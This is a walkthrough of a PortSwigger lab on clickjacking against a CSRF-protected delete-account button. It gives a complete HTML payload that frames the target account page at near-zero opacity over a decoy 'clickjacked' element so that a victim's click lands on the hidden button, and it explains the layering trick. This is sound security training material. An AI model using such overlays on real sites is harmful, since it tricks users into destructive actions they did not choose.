Clickjacking Portswigger

Basic clickjacking with CSRF token protection

Task :

This lab contains login functionality and a delete account button that is protected by a CSRF token. A user will click on elements that display the word "click" on a decoy website. To solve the lab, craft some HTML that frames the account page and fools the user into deleting their account. The lab is solved when the account is deleted. You can log in to your own account using the following credentials: wiener:peter.

Walk trough :

When login in we have a page with two button. Our goal will be to trick the victim and make him click on the delete button.

We have a server part on the lab where we can build our payload. Let's build a basic html payload :

<style>
    iframe {
        position:relative;
        width: 100%;
        height: 100%;
        opacity: 0.001;
        z-index: 2;
    }
    div {
        position:absolute;
        top: 500px;
        left: 120px;
        z-index: 1;
    }
</style>
<div>clickjacked</div>
<iframe src="https://0af600c603fe678382405106008200ed.web-security-academy.net/my-account"></iframe>

The goal here is to have the vulnerable app within the iframe link and to build another app or overlay over it to trick the victim. We are using opacity and z-index to create a scenario where the iframewill be visually hidden but actually the first in the z-index order.

Like, the victim will land on a page and want to click on something

But in fact what he is seeing is actually not the first layer of the z-index. When he clicks, it will trigger a click at the current position on the iframed page. Here, I increase the opacity value so we can see the content that is a priority.